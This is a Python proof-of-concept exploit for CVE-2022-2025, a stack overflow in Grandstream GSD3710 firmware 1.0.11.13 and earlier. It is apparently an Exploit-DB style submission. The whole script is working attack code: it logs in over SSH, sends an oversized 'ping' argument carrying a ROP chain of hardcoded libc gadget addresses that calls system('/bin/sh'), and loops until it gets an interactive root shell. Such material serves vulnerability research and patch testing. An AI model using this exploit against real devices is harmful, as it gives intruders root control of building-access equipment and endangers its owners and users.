#!/usr/bin/env python3
# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow
# Date: 2025-05-29
# Exploit Author: Pepelux
# Vendor Homepage: https://www.grandstream.com/
# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
# Tested on: Linux and MacOS
# CVE: CVE-2022-2025
"""
Author: Jose Luis Verdeguer (@pepeluxx)
Required: Pwntools
Example:
$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD
"""
from struct import pack
import sys
from time import sleep
import argparse
from pwn import *
def get_args():
parser = argparse.ArgumentParser(
formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
prog, max_help_position=50))
# Add arguments
parser.add_argument('-i', '--ip', type=str, required=True,
help='device IP address', dest="ip")
parser.add_argument('-u', '--user', type=str, required=True,
help='username', dest="user")
parser.add_argument('-p', '--pass', type=str, required=True,
help='password', dest="pwd")
# Array for all arguments passed to script
args = parser.parse_args()
try:
ip = args.ip
user = args.user
pwd = args.pwd
return ip, user, pwd
except ValueError:
exit()
def check_badchars(payload):
for i in range(5, len(payload)):
if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]:
log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i))
return True
return False
def main():
ip, user, pwd = get_args()
libc_base = 0x76bb8000
gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc};
bin_sh = libc_base + 0xCEA9C # /bin/sh
system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc
exit = libc_base + 0x2660C
print("[*] Libc base: %#x" % libc_base)
print("[*] ROP gadget: %#x" % gadget)
print("[*] /bin/sh: %#x" % bin_sh)
print("[*] system: %#x" % system)
print("[*] exit: %#x\n" % exit)
padding = b"A" * 320
payload = b'ping '
payload += padding
payload += p32(gadget)
payload += p32(bin_sh)
payload += b"AAAA"
payload += p32(system)
payload += p32(exit)
if check_badchars(payload):
sys.exit(0)
count = 1
while True:
print('Try: %d' % count)
s = ssh(user, ip, 22, pwd)
p = s.shell(tty=False)
print(p.readuntil(b"GDS3710> "))
p.sendline(payload)
p.sendline(b"id")
sleep(1)
data = p.read()
if str(data).find('root') > -1:
print('PWNED!')
p.interactive()
s.close()
sys.exit()
s.close()
count += 1
if __name__ == '__main__':
main()